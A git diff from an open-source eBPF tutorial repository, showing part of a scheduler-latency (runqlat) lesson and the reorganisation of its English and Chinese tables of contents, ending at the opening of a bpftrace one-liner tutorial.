task_struct *task) -{ - struct pid *pid; - unsigned int level; - struct upid upid; - unsigned int inum; - - /* get the pid namespace by following task_active_pid_ns(), - * pid->numbers[pid->level].ns - */ - pid = BPF_CORE_READ(task, thread_pid); - level = BPF_CORE_READ(pid, level); - bpf_core_read(&upid, sizeof(upid), &pid->numbers[level]); - inum = BPF_CORE_READ(upid.ns, ns.inum); - - return inum; -} -``` - -The `handle_switch` function is the core part, used to handle scheduling switch events, calculate process scheduling latency, and update histogram data: - -```c -static int handle_switch(bool preempt, struct task_struct *prev, struct task_struct *next) -{ - ... -} -``` - -Firstly, the function determines whether to filter cgroup based on the setting of `filter_cg`. Then, if the previous process state is `TASK_RUNNING`, the `trace_enqueue` function is called to record the enqueue time of the process. Then, the function looks up the enqueue timestamp of the next process. If it is not found, it returns directly. The scheduling latency (delta) is calculated, and the key for the histogram map (hkey) is determined based on different options (targ_per_process, targ_per_thread, targ_per_pidns). Then, the histogram map is looked up or initialized, and the histogram data is updated. Finally, the enqueue timestamp record of the process is deleted. - -Next is the entry point of the eBPF program. The program uses three entry points to capture different scheduling events: - -- `handle_sched_wakeup`: Used to handle the `sched_wakeup` event triggered when a process is woken up from sleep state. -- `handle_sched_wakeup_new`: Used to handle the `sched_wakeup_new` event triggered when a newly created process is woken up. -- `handle_sched_switch`: Used to handle the `sched_switch` event triggered when the scheduler selects a new process to run. - -These entry points handle different scheduling events, but all call the `handle_switch` function to calculate the scheduling latency of the process and update the histogram data. - -Finally, the program includes a license declaration: - -```c -char LICENSE[] SEC("license") = "GPL"; -``` - -This declaration specifies the license type of the eBPF program, which is "GPL" in this case. This is required for many kernel features as they require eBPF programs to follow the GPL license. - -### runqlat.h - -Next, we need to define a header file `runqlat.h` for handling events reported from kernel mode to user mode: - -```c -/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ -#ifndef __RUNQLAT_H -#define __RUNQLAT_H - -#define TASK_COMM_LEN 16 -#define MAX_SLOTS 26 - -struct hist { - __u32 slots[MAX_SLOTS]; - char comm[TASK_COMM_LEN]; -}; - -#endif /* __RUNQLAT_H */ -``` - -## Compilation and Execution - -We will use `eunomia-bpf` to compile and run this example. You can refer to to download and install the `ecc` compilation toolkit and `ecli` runtime. - -Compile: - -```shell -docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest -``` - -or - -```console -$ ecc runqlat.bpf.c runqlat.h -Compiling bpf object... -Generating export types... -Packing ebpf object and config into package.json... -``` - -Run: - -```console -$ sudo ecli run examples/bpftools/runqlat/package.json -h -Usage: runqlat_bpf [--help] [--version] [--verbose] [--filter_cg] [--targ_per_process] [--targ_per_thread] [--targ_per_pidns] [--targ_ms] [--targ_tgid VAR] - -A simple eBPF program - -Optional arguments: --h, --help shows help message and exits --v, --version prints version information and exits ---verbose prints libbpf debug information ---filter_cg set value of bool variable filter_cg ---targ_per_process set value of bool variable targ_per_process ---targ_per_thread set value of bool variable targ_per_thread ---targ_per_pidns set value of bool variable targ_per_pidns ---targ_ms set value of bool variable targ_ms ---targ_tgid set value of pid_t variable targ_tgid - -$ sudo ecli run examples/bpftools/runqlat/package.json -key = 4294967295 -comm = rcu_preempt - - (unit) : count distribution - 0 -> 1 : 9 |**** | - 2 -> 3 : 6 |** | - 4 -> 7 : 12 |***** | - 8 -> 15 : 28 |************* | - 16 -> 31 : 40 |******************* | - 32 -> 63 : 83 |****************************************| - 64 -> 127 : 57 |*************************** | - 128 -> 255 : 19 |********* | - 256 -> 511 : 11 |***** | - 512 -> 1023 : 2 | | - 1024 -> 2047 : 2 | | - 2048 -> 4095 : 0 | | - 4096 -> 8191 : 0 | | - 8192 -> 16383 : 0 | | - 16384 -> 32767 : 1 | | - -$ sudo ecli run examples/bpftools/runqlat/package.json --targ_per_process -key = 3189 -comm = cpptools - - (unit) : count distribution - 0 -> 1 : 0 | | - 2 -> 3 : 0 | | - 4 -> 7 : 0 | | - 8 -> 15 : 1 |*** | - 16 -> 31 : 2 |******* | - 32 -> 63 : 11 |****************************************| - 64 -> 127 : 8 |***************************** | - 128 -> 255 : 3 |********** | - -``` - -Complete source code can be found at: - -References: - -- -- - -## Summary - -runqlat is a Linux kernel BPF program that summarizes scheduler run queue latency using a bar chart to show the length of time tasks wait to run on a CPU. To compile this program, you can use the `ecc` tool and to run it, you can use the `ecli` command. - -runqlat is a tool for monitoring process scheduling latency in the Linux kernel. It can help you understand the time processes spend waiting to run in the kernel and optimize process scheduling based on this information to improve system performance. The original source code can be found in libbpf-tools: - -If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at or website for more examples and complete tutorials. diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 5632b68..61c9ebe 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -1,69 +1,89 @@ -# eBPF 开发实践教程:基于 CO-RE,通过小工具快速上手 eBPF 开发 +# eBPF Tutorial by Example: Learning CO-RE eBPF Step by Step -这是一个基于 `CO-RE`(一次编译,到处运行)的 eBPF 的开发教程,提供了从入门到进阶的 eBPF 开发实践,包括基本概念、代码实例、实际应用等内容。和 BCC 不同的是,我们使用 libbpf、Cilium、libbpf-rs、eunomia-bpf 等框架进行开发,包含 C、Go、Rust 等语言的示例。 +[![CI](https://github.com/eunomia-bpf/bpf-developer-tutorial/actions/workflows/main.yml/badge.svg)](https://github.com/eunomia-bpf/bpf-developer-tutorial/actions/workflows/main.yml) -本教程不会进行复杂的概念讲解和场景介绍,主要希望提供一些 eBPF 小工具的案例(**非常短小,从二十行代码开始入门!**),来帮助 eBPF 应用的开发者快速上手 eBPF 的开发方法和技巧。教程内容可以在目录中找到,每个目录都是一个独立的 eBPF 工具案例。 +This is a development tutorial for eBPF based on CO-RE (Compile Once, Run Everywhere). It provides practical eBPF development practices from beginner to advanced, including basic concepts, code examples, and real-world applications. Unlike BCC, we use frameworks like libbpf, Cilium, libbpf-rs, and eunomia-bpf for development, with examples in languages such as C, Go, and Rust. -教程关注于可观测性、网络、安全等等方面的 eBPF 示例。完整的代码和教程可以在 [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) GitHub 开源仓库中找到。**如果您认为本教程对您有所帮助,也请给我们一个 star 鼓励一下!** +This tutorial does not cover complex concepts and scenario introductions. Its main purpose is to provide examples of eBPF tools (**very short, starting with twenty lines of code!**) to help eBPF application developers quickly grasp eBPF development methods and techniques. The tutorial content can be found in the directory, with each directory being an independent eBPF tool example. -# 入门文档 +For the complete source code of the tutorial, please refer to the repo [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) on GitHub. **If you find this tutorial helpful, please give us a star!** -包含简单的 eBPF 程序样例与介绍,这部分主要使用 `eunomia-bpf` 框架简化开发,并介绍了 eBPF 的基本使用方式和开发流程。 +# Getting Started Examples -- [lesson 0-introduce](0-introduce/README.md) 介绍 eBPF 的基本概念和常见的开发工具 -- [lesson 1-helloworld](1-helloworld/README.md) 使用 eBPF 开发最简单的「Hello World」程序,介绍 eBPF 的基本框架和开发流程 -- [lesson 2-kprobe-unlink](2-kprobe-unlink/README.md) 在 eBPF 中使用 kprobe 捕获 unlink 系统调用 -- [lesson 3-fentry-unlink](3-fentry-unlink/README.md) 在 eBPF 中使用 fentry 捕获 unlink 系统调用 -- [lesson 4-opensnoop](4-opensnoop/README.md) 使用 eBPF 捕获进程打开文件的系统调用集合,使用全局变量在 eBPF 中过滤进程 pid -- [lesson 5-uprobe-bashreadline](5-uprobe-bashreadline/README.md) 在 eBPF 中使用 uprobe 捕获 bash 的 readline 函数调用 -- [lesson 6-sigsnoop](6-sigsnoop/README.md) 捕获进程发送信号的系统调用集合,使用 hash map 保存状态 -- [lesson 7-execsnoop](7-execsnoop/README.md) 捕获进程执行时间,通过 perf event array 向用户态打印输出 -- [lesson 8-execsnoop](8-exitsnoop/README.md) 捕获进程退出事件,使用 ring buffer 向用户态打印输出 -- [lesson 9-runqlat](9-runqlat/README.md) 捕获进程调度延迟,以直方图方式记录 -- [lesson 10-hardirqs](10-hardirqs/README.md) 使用 hardirqs 或 softirqs 捕获中断事件 +This section contains simple eBPF program examples and introductions. It primarily utilizes the `eunomia-bpf` framework to simplify development and introduces the basic usage and development process of eBPF. -# 进阶文档和示例 +- [lesson 0-introduce](0-introduce/README.md) Introduction to Core Concepts and Tools +- [lesson 1-helloworld](1-helloworld/README.md) Hello World, Framework and Development +- [lesson 2-kprobe-unlink](2-kprobe-unlink/README.md) Monitoring unlink System Calls with kprobe +- [lesson 3-fentry-unlink](3-fentry-unlink/README.md) Monitoring unlink System Calls with fentry +- [lesson 4-opensnoop](4-opensnoop/README.md) Capturing Opening Files and Filter with Global Variables +- [lesson 5-uprobe-bashreadline](5-uprobe-bashreadline/README.md) Capturing readline Function Calls with Uprobe +- [lesson 6-sigsnoop](6-sigsnoop/README.md) Capturing Signal Sending and Store State with Hash Maps +- [lesson 7-execsnoop](7-execsnoop/README.md) Capturing Process Execution, Output with perf event array +- [lesson 8-exitsnoop](8-exitsnoop/README.md) Monitoring Process Exit Events, Output with Ring Buffer +- [lesson 9-runqlat](9-runqlat/README.md) Capturing Scheduling Latency and Recording as Histogram +- [lesson 10-hardirqs](10-hardirqs/README.md) Capturing Interrupts with hardirqs or softirqs -我们开始主要基于 `libbpf` 构建完整的 eBPF 工程,并且把它和各种应用场景结合起来进行实践。 +# Advanced Documents and Examples -- [lesson 11-bootstrap](11-bootstrap/README.md) 使用 libbpf-bootstrap 为 eBPF 编写原生的 libbpf 用户态代码,并建立完整的 libbpf 工程。 -- [lesson 12-profile](12-profile/README.md) 使用 eBPF 进行性能分析 -- [lesson 13-tcpconnlat](13-tcpconnlat/README.md) 记录 TCP 连接延迟,并使用 libbpf 在用户态处理数据 -- [lesson 14-tcpstates](14-tcpstates/README.md) 记录 TCP 连接状态与 TCP RTT -- [lesson 15-javagc](15-javagc/README.md) 使用 usdt 捕获用户态 Java GC 事件耗时 -- [lesson 16-memleak](16-memleak/README.md) 检测内存泄漏 -- [lesson 17-biopattern](17-biopattern/README.md) 捕获磁盘 IO 模式 -- [lesson 18-further-reading](18-further-reading/README.md) 更进一步的相关资料:论文列表、项目、博客等等 -- [lesson 19-lsm-connect](19-lsm-connect/README.md) 使用 LSM 进行安全检测防御 -- [lesson 20-tc](20-tc/README.md) 使用 eBPF 进行 tc 流量控制 -- [lesson 21-xdp](21-xdp/README.md) 使用 eBPF 进行 XDP 报文处理 +We start to build complete eBPF projects mainly based on `libbpf` and combine them with various application scenarios for practical use. -# 高级主题 +- [lesson 11-bootstrap](11-bootstrap/README.md) Develop User-Space Programs with libbpf and Trace exec() and exit() +- [lesson 12-profile](12-profile/README.md) Using eBPF Program Profile for Performance Analysis +- [lesson 13-tcpconnlat](13-tcpconnlat/README.md) Statistics of TCP Connection Delay with libbpf +- [lesson 14-tcpstates](14-tcpstates/README.md) Recording TCP Connection Status and TCP RTT +- [lesson 15-javagc](15-javagc/README.md) Capturing User-Space Java GC Duration Using USDT +- [lesson 16-memleak](16-memleak/README.md) Monitoring Memory Leaks +- [lesson 17-biopattern](17-biopattern/README.md) Count Random/Sequential Disk I/O +- [lesson 18-further-reading](18-further-reading/README.md) More Reference Materials: papers, projects +- [lesson 19-lsm-connect](19-lsm-connect/README.md) Security Detection and Defense using LSM +- [lesson 20-tc](20-tc/README.md) tc Traffic Control +- [lesson 21-xdp](21-xdp/README.md) Programmable Packet Processing with XDP -这里涵盖了一系列和 eBPF 相关的高级内容,包含在 Android 上使用 eBPF 程序、使用 eBPF 程序进行可能的攻击与防御、复杂的追踪等等。这部分主要基于 libbpf、Cilium 等框架进行开发。 +# In-Depth Topics -- [在 Android 上使用 eBPF 程序](22-android/README.md) -- [使用 uprobe 捕获多种库的 SSL/TLS 明文数据](30-sslsniff/README.md) -- [使用 eBPF socket filter 或 syscall trace 追踪 HTTP 请求和其他七层协议](23-http/README.md) -- [使用 sockops 加速网络请求转发](29-sockops/README.md) -- [使用 eBPF 隐藏进程或文件信息](24-hide/README.md) -- [使用 bpf_send_signal 发送信号终止进程](25-signal/README.md) -- [使用 eBPF 添加 sudo 用户](26-sudo/README.md) -- [使用 eBPF 替换任意程序读取或写入的文本](27-replace/README.md) -- [BPF 的生命周期:使用 Detached 模式在用户态应用退出后持续运行 eBPF 程序](28-detach/README.md) -- [eBPF 运行时的安全性与面临的挑战](18-further-reading/ebpf-security.zh.md) -- [使用 eBPF 修改系统调用参数](34-syscall/README.md) -- [eBPF开发实践:使用 user ring buffer 向内核异步发送信息](35-user-ringbuf/README.md) -- [用户空间 eBPF 运行时:深度解析与应用实践](36-userspace-ebpf/README.md) -- [使用 uprobe 追踪 Rust 应用程序](37-uprobe-rust/README.md) -- [借助 eBPF 和 BTF,让用户态也能一次编译、到处运行](38-btf-uprobe/README.md) +This section covers advanced topics related to eBPF, including using eBPF programs on Android, possible attacks and defenses using eBPF programs, and complex tracing. Combining the user-mode and kernel-mode aspects of eBPF can bring great power (as well as security risks). -# bcc 和 bpftrace 教程与文档 +Android: + +- [lesson 22-android](22-android/README.md) Using eBPF Programs on Android + +Networking: + +- [lesson 23-http](23-http/README.md) L7 Tracing with eBPF: HTTP and Beyond via Socket Filters and Syscall Tracepoints +- [lesson 29-sockops](29-sockops/README.md) Accelerating Network Request Forwarding with Sockops +- [lesson 41-xdp-tcpdump](41-xdp-tcpdump/README.md) Capturing TCP Information with XDP +- [lesson 42-xdp-loadbalancer](42-xdp-loadbalancer/README.md) XDP Load Balancer + +Security: + +- [lesson 24-hide](24-hide/README.md) Hiding Process or File Information +- [lesson 25-signal](25-signal/README.md) Using bpf_send_signal to Terminate Malicious Processes in eBPF +- [lesson 26-sudo](26-sudo/README.md) Using eBPF to add sudo user +- [lesson 27-replace](27-replace/README.md) Replace Text Read or Written by Any Program with eBPF +- [lesson 28-detach](28-detach/README.md) Running eBPF After Application Exits: The Lifecycle of eBPF Programs +- [lesson 34-syscall](34-syscall/README.md) Modifying System Call Arguments with eBPF + +Scheduler: + +- [lesson 44-scx-simple](44-scx-simple/README.md) Introduction to the BPF Scheduler + +Other: + +- [lesson 35-user-ringbuf](35-user-ringbuf/README.md) Asynchronously Send to Kernel with User Ring Buffer +- [lesson 36-userspace-ebpf](36-userspace-ebpf/README.md) Userspace eBPF Runtimes: Overview and Applications +- [lesson 38-btf-uprobe](38-btf-uprobe/README.md) Expanding eBPF Compile Once, Run Everywhere(CO-RE) to Userspace Compatibility +- [lesson 43-kfuncs](43-kfuncs/README.md) Extending eBPF Beyond Its Limits: Custom kfuncs in Kernel Modules + +Continuously updating... + +# bcc and bpftrace tutorial + +For reference: - [BPF Features by Linux Kernel Version](bcc-documents/kernel-versions.md) - [Kernel Configuration for BPF Features](bcc-documents/kernel_config.md) - [bcc Reference Guide](bcc-documents/reference_guide.md) - [Special Filtering](bcc-documents/special_filtering.md) -- [bcc Tutorial](bcc-documents/tutorial.md) -- [bcc Python Developer Tutorial](bcc-documents/tutorial_bcc_python_developer.md) +- [bcc Tutorial](bcc-documents/tutorial.md)".- [bcc Python Developer Tutorial](bcc-documents/tutorial_bcc_python_developer.md) - [bpftrace Tutorial](bpftrace-tutorial/README.md) diff --git a/src/SUMMARY.zh.md b/src/SUMMARY.zh.md new file mode 100644 index 0000000..cad39d3 --- /dev/null +++ b/src/SUMMARY.zh.md @@ -0,0 +1,82 @@ +# eBPF 开发实践教程:基于 CO-RE,通过小工具快速上手 eBPF 开发 + +这是一个基于 `CO-RE`(一次编译,到处运行)的 eBPF 的开发教程,提供了从入门到进阶的 eBPF 开发实践,包括基本概念、代码实例、实际应用等内容。和 BCC 不同的是,我们使用 libbpf、Cilium、libbpf-rs、eunomia-bpf 等框架进行开发,包含 C、Go、Rust 等语言的示例。 + +本教程不会进行复杂的概念讲解和场景介绍,主要希望提供一些 eBPF 小工具的案例(**非常短小,从二十行代码开始入门!**),来帮助 eBPF 应用的开发者快速上手 eBPF 的开发方法和技巧。教程内容可以在目录中找到,每个目录都是一个独立的 eBPF 工具案例。 + +教程关注于可观测性、网络、安全等等方面的 eBPF 示例。完整的代码和教程可以在 [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) GitHub 开源仓库中找到。**如果您认为本教程对您有所帮助,也请给我们一个 star 鼓励一下!** + +# 入门示例 + +这一部分包含简单的 eBPF 程序示例和介绍。主要利用 `eunomia-bpf` 框架简化开发,介绍 eBPF 的基本用法和开发流程。 + +- [lesson 0-introduce](0-introduce/README.zh.md) eBPF 示例教程 0:核心概念与工具简介 +- [lesson 1-helloworld](1-helloworld/README.zh.md) eBPF 入门开发实践教程一:Hello World,基本框架和开发流程 +- [lesson 2-kprobe-unlink](2-kprobe-unlink/README.zh.md) eBPF 入门开发实践教程二:在 eBPF 中使用 kprobe 监测捕获 unlink 系统调用 +- [lesson 3-fentry-unlink](3-fentry-unlink/README.zh.md) eBPF 入门开发实践教程三:在 eBPF 中使用 fentry 监测捕获 unlink 系统调用 +- [lesson 4-opensnoop](4-opensnoop/README.zh.md) eBPF 入门开发实践教程四:在 eBPF 中捕获进程打开文件的系统调用集合,使用全局变量过滤进程 pid +- [lesson 5-uprobe-bashreadline](5-uprobe-bashreadline/README.zh.md) eBPF 入门开发实践教程五:在 eBPF 中使用 uprobe 捕获 bash 的 readline 函数调用 +- [lesson 6-sigsnoop](6-sigsnoop/README.zh.md) eBPF 入门开发实践教程六:捕获进程发送信号的系统调用集合,使用 hash map 保存状态 +- [lesson 7-execsnoop](7-execsnoop/README.zh.md) eBPF 入门实践教程七:捕获进程执行事件,通过 perf event array 向用户态打印输出 +- [lesson 8-exitsnoop](8-exitsnoop/README.zh.md) eBPF 入门开发实践教程八:在 eBPF 中使用 exitsnoop 监控进程退出事件,使用 ring buffer 向用户态打印输出 +- [lesson 9-runqlat](9-runqlat/README.zh.md) eBPF 入门开发实践教程九:捕获进程调度延迟,以直方图方式记录 +- [lesson 10-hardirqs](10-hardirqs/README.zh.md) eBPF 入门开发实践教程十:在 eBPF 中使用 hardirqs 或 softirqs 捕获中断事件 + +# 高级文档和示例 + +我们开始构建完整的 eBPF 项目,主要基于 `libbpf`,并将其与各种应用场景结合起来,以便实际使用。 + +- [lesson 11-bootstrap](11-bootstrap/README.zh.md) eBPF 入门开发实践教程十一:在 eBPF 中使用 libbpf 开发用户态程序并跟踪 exec() 和 exit() 系统调用 +- [lesson 12-profile](12-profile/README.zh.md) eBPF 入门实践教程十二:使用 eBPF 程序 profile 进行性能分析 +- [lesson 13-tcpconnlat](13-tcpconnlat/README.zh.md) eBPF入门开发实践教程十三:统计 TCP 连接延时,并使用 libbpf 在用户态处理数据 +- [lesson 14-tcpstates](14-tcpstates/README.zh.md) eBPF入门实践教程十四:记录 TCP 连接状态与 TCP RTT +- [lesson 15-javagc](15-javagc/README.zh.md) eBPF 入门实践教程十五:使用 USDT 捕获用户态 Java GC 事件耗时 +- [lesson 16-memleak](16-memleak/README.zh.md) eBPF 入门实践教程十六:编写 eBPF 程序 Memleak 监控内存泄漏 +- [lesson 17-biopattern](17-biopattern/README.zh.md) eBPF 入门实践教程十七:编写 eBPF 程序统计随机/顺序磁盘 I/O +- [lesson 18-further-reading](18-further-reading/README.zh.md) 更多的参考资料:论文、项目等等 +- [lesson 19-lsm-connect](19-lsm-connect/README.zh.md) eBPF 入门实践教程:使用 LSM 进行安全检测防御 +- [lesson 20-tc](20-tc/README.zh.md) eBPF 入门实践教程二十:使用 eBPF 进行 tc 流量控制 +- [lesson 21-xdp](21-xdp/README.zh.md) eBPF 入门实践教程二十一: 使用 XDP 进行可编程数据包处理 + +# 深入主题 + +这一部分涵盖了与 eBPF 相关的高级主题,包括在 Android 上使用 eBPF 程序、利用 eBPF 程序进行的潜在攻击和防御以及复杂的追踪。结合用户模式和内核模式的 eBPF 可以带来强大的能力(也可能带来安全风险)。 + +Android: + +- [lesson 22-android](22-android/README.zh.md) 在 Android 上使用 eBPF 程序 +网络: + +- [lesson 23-http](23-http/README.zh.md) 通过 eBPF socket filter 或 syscall trace 追踪 HTTP 请求等七层协议 - eBPF 实践教程 +- [lesson 29-sockops](29-sockops/README.zh.md) eBPF 开发实践:使用 sockops 加速网络请求转发 +- [lesson 41-xdp-tcpdump](41-xdp-tcpdump/README.zh.md) eBPF 示例教程:使用 XDP 捕获 TCP 信息 +- [lesson 42-xdp-loadbalancer](42-xdp-loadbalancer/README.zh.md) eBPF 开发者教程: 简单的 XDP 负载均衡器 +安全: + +- [lesson 24-hide](24-hide/README.zh.md) eBPF 开发实践:使用 eBPF 隐藏进程或文件信息 +- [lesson 25-signal](25-signal/README.zh.md) eBPF 入门实践教程:用 bpf_send_signal 发送信号终止恶意进程 +- [lesson 26-sudo](26-sudo/README.zh.md) 使用 eBPF 添加 sudo 用户 +- [lesson 27-replace](27-replace/README.zh.md) 使用 eBPF 替换任意程序读取或写入的文本 +- [lesson 28-detach](28-detach/README.zh.md) 在应用程序退出后运行 eBPF 程序:eBPF 程序的生命周期 +- [lesson 34-syscall](34-syscall/README.zh.md) eBPF 开发实践:使用 eBPF 修改系统调用参数 +调度器: + +- [lesson 44-scx-simple](44-scx-simple/README.zh.md) None +其他: + +- [lesson 35-user-ringbuf](35-user-ringbuf/README.zh.md) eBPF开发实践:使用 user ring buffer 向内核异步发送信息 +- [lesson 36-userspace-ebpf](36-userspace-ebpf/README.zh.md) 用户空间 eBPF 运行时:深度解析与应用实践 +- [lesson 38-btf-uprobe](38-btf-uprobe/README.zh.md) 借助 eBPF 和 BTF,让用户态也能一次编译、到处运行 +- [lesson 43-kfuncs](43-kfuncs/README.zh.md) 超越 eBPF 的极限:在内核模块中定义自定义 kfunc + +持续更新中... + +# bcc 和 bpftrace 教程与文档 + +- [BPF Features by Linux Kernel Version](bcc-documents/kernel-versions.md) +- [Kernel Configuration for BPF Features](bcc-documents/kernel_config.md) +- [bcc Reference Guide](bcc-documents/reference_guide.md) +- [Special Filtering](bcc-documents/special_filtering.md) +- [bcc Tutorial](bcc-documents/tutorial.md) +- [bcc Python Developer Tutorial](bcc-documents/tutorial_bcc_python_developer.md) +- [bpftrace Tutorial](bpftrace-tutorial/README.md) diff --git a/src/SUMMARY_en.md b/src/SUMMARY_en.md deleted file mode 100644 index 8e78a74..0000000 --- a/src/SUMMARY_en.md +++ /dev/null @@ -1,89 +0,0 @@ -# eBPF Tutorial by Example: Learning CO-RE eBPF Step by Step - -[![CI](https://github.com/eunomia-bpf/bpf-developer-tutorial/actions/workflows/main.yml/badge.svg)](https://github.com/eunomia-bpf/bpf-developer-tutorial/actions/workflows/main.yml) - -This is a development tutorial for eBPF based on CO-RE (Compile Once, Run Everywhere). It provides practical eBPF development practices from beginner to advanced, including basic concepts, code examples, and real-world applications. Unlike BCC, we use frameworks like libbpf, Cilium, libbpf-rs, and eunomia-bpf for development, with examples in languages such as C, Go, and Rust. - -This tutorial does not cover complex concepts and scenario introductions. Its main purpose is to provide examples of eBPF tools (**very short, starting with twenty lines of code!**) to help eBPF application developers quickly grasp eBPF development methods and techniques. The tutorial content can be found in the directory, with each directory being an independent eBPF tool example. - -For the complete source code of the tutorial, please refer to the repo [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) on GitHub. **If you find this tutorial helpful, please give us a star!** - -# Getting Started Examples - -This section contains simple eBPF program examples and introductions. It primarily utilizes the `eunomia-bpf` framework to simplify development and introduces the basic usage and development process of eBPF. - -- [lesson 0-introduce](0-introduce/README_en.md) Introduction to Core Concepts and Tools -- [lesson 1-helloworld](1-helloworld/README_en.md) Hello World, Framework and Development -- [lesson 2-kprobe-unlink](2-kprobe-unlink/README_en.md) Monitoring unlink System Calls with kprobe -- [lesson 3-fentry-unlink](3-fentry-unlink/README_en.md) Monitoring unlink System Calls with fentry -- [lesson 4-opensnoop](4-opensnoop/README_en.md) Capturing Opening Files and Filter with Global Variables -- [lesson 5-uprobe-bashreadline](5-uprobe-bashreadline/README_en.md) Capturing readline Function Calls with Uprobe -- [lesson 6-sigsnoop](6-sigsnoop/README_en.md) Capturing Signal Sending and Store State with Hash Maps -- [lesson 7-execsnoop](7-execsnoop/README_en.md) Capturing Process Execution, Output with perf event array -- [lesson 8-exitsnoop](8-exitsnoop/README_en.md) Monitoring Process Exit Events, Output with Ring Buffer -- [lesson 9-runqlat](9-runqlat/README_en.md) Capturing Scheduling Latency and Recording as Histogram -- [lesson 10-hardirqs](10-hardirqs/README_en.md) Capturing Interrupts with hardirqs or softirqs - -# Advanced Documents and Examples - -We start to build complete eBPF projects mainly based on `libbpf` and combine them with various application scenarios for practical use. - -- [lesson 11-bootstrap](11-bootstrap/README_en.md) Develop User-Space Programs with libbpf and Trace exec() and exit() -- [lesson 12-profile](12-profile/README_en.md) Using eBPF Program Profile for Performance Analysis -- [lesson 13-tcpconnlat](13-tcpconnlat/README_en.md) Statistics of TCP Connection Delay with libbpf -- [lesson 14-tcpstates](14-tcpstates/README_en.md) Recording TCP Connection Status and TCP RTT -- [lesson 15-javagc](15-javagc/README_en.md) Capturing User-Space Java GC Duration Using USDT -- [lesson 16-memleak](16-memleak/README_en.md) Monitoring Memory Leaks -- [lesson 17-biopattern](17-biopattern/README_en.md) Count Random/Sequential Disk I/O -- [lesson 18-further-reading](18-further-reading/README_en.md) More Reference Materials: papers, projects -- [lesson 19-lsm-connect](19-lsm-connect/README_en.md) Security Detection and Defense using LSM -- [lesson 20-tc](20-tc/README_en.md) tc Traffic Control -- [lesson 21-xdp](21-xdp/README_en.md) Programmable Packet Processing with XDP - -# In-Depth Topics - -This section covers advanced topics related to eBPF, including using eBPF programs on Android, possible attacks and defenses using eBPF programs, and complex tracing. Combining the user-mode and kernel-mode aspects of eBPF can bring great power (as well as security risks). - -Android: - -- [lesson 22-android](22-android/README_en.md) Using eBPF Programs on Android - -Networking: - -- [lesson 23-http](23-http/README_en.md) L7 Tracing with eBPF: HTTP and Beyond via Socket Filters and Syscall Tracepoints -- [lesson 29-sockops](29-sockops/README_en.md) Accelerating Network Request Forwarding with Sockops -- [lesson 41-xdp-tcpdump](41-xdp-tcpdump/README_en.md) Capturing TCP Information with XDP -- [lesson 42-xdp-loadbalancer](42-xdp-loadbalancer/README_en.md) XDP Load Balancer - -Security: - -- [lesson 24-hide](24-hide/README_en.md) Hiding Process or File Information -- [lesson 25-signal](25-signal/README_en.md) Using bpf_send_signal to Terminate Malicious Processes in eBPF -- [lesson 26-sudo](26-sudo/README_en.md) Using eBPF to add sudo user -- [lesson 27-replace](27-replace/README_en.md) Replace Text Read or Written by Any Program with eBPF -- [lesson 28-detach](28-detach/README_en.md) Running eBPF After Application Exits: The Lifecycle of eBPF Programs -- [lesson 34-syscall](34-syscall/README_en.md) Modifying System Call Arguments with eBPF - -Scheduler: - -- [lesson 44-scx-simple](44-scx-simple/README_en.md) Introduction to the BPF Scheduler - -Other: - -- [lesson 35-user-ringbuf](35-user-ringbuf/README_en.md) Asynchronously Send to Kernel with User Ring Buffer -- [lesson 36-userspace-ebpf](36-userspace-ebpf/README_en.md) Userspace eBPF Runtimes: Overview and Applications -- [lesson 38-btf-uprobe](38-btf-uprobe/README_en.md) Expanding eBPF Compile Once, Run Everywhere(CO-RE) to Userspace Compatibility -- [lesson 43-kfuncs](43-kfuncs/README_en.md) Extending eBPF Beyond Its Limits: Custom kfuncs in Kernel Modules - -Continuously updating... - -# bcc and bpftrace tutorial - -For reference: - -- [BPF Features by Linux Kernel Version](bcc-documents/kernel-versions.md) -- [Kernel Configuration for BPF Features](bcc-documents/kernel_config.md) -- [bcc Reference Guide](bcc-documents/reference_guide.md) -- [Special Filtering](bcc-documents/special_filtering.md) -- [bcc Tutorial](bcc-documents/tutorial.md)".- [bcc Python Developer Tutorial](bcc-documents/tutorial_bcc_python_developer.md) -- [bpftrace Tutorial](bpftrace-tutorial/README.md) diff --git a/src/bpftrace-tutorial/README.md b/src/bpftrace-tutorial/README.md index 010f506..bb5788b 100644 --- a/src/bpftrace-tutorial/README.md +++ b/src/bpftrace-tutorial/README.md @@ -1,22 +1,22 @@ -# bpftrace一行教程 +# The bpftrace One-Liner Tutorial -该教程通过12个简单小节帮助你了解bpftrace的使用。每一小节都是一行的命令,你可以尝试运行并立刻看到运行效果。该教程系列用来介绍bpftrace的概念。关于bpftrace的完整参考,见[bpftrace手册](https://github.com/iovisor/bpftrace/blob/master/man/adoc/bpftrace.adoc)。 +This teaches you bpftrace for Linux in 12 easy lessons, where each lesson is a one-liner you can try running. This series of one-liners introduces concepts which are summarized as bullet points. For a full reference to bpftrace, see the [Man page](https://github.com/iovisor/bpftrace/blob/master/docs/../man/adoc/bpftrace.adoc) -该教程贡献者是Brendan Gregg, Netflix (2018), 基于他的FreeBSD DTrace教程系列[DTrace Tutorial](https://wiki.freebsd.org/DTrace/Tutorial)。 +Contributed by Brendan Gregg, Netflix (2018), based on his FreeBSD [DTrace Tutorial](https://wiki.freebsd.org/DTrace/Tutorial). -# 1. 列出所有探针 +# Lesson 1. Listing Probes ``` bpftrace -l 'tracepoint:syscalls:sys_enter_*' ``` -"bpftrace -l" 列出所有探针,并且可以添加搜索项。 +"bpftrace -l" lists all probes, and a search term can be added. -- 探针是用于捕获事件数据的检测点。 -- 搜索词支持通配符,如`*`和`?`。 -- "bpftrace -l" 也可以通过管道传递给grep,进行完整的正则表达式搜索。 +- A probe is an instrumentation point for capturing event data. +- The supplied search term supports wildcards/globs (`*` and `?`) +- "bpftrace -l" can also be piped to grep(1) for full regular expression searching. -# 2. Hello World +# Lesson 2. Hello World ``` # bpftrace -e 'BEGIN { printf("hello world\n"); 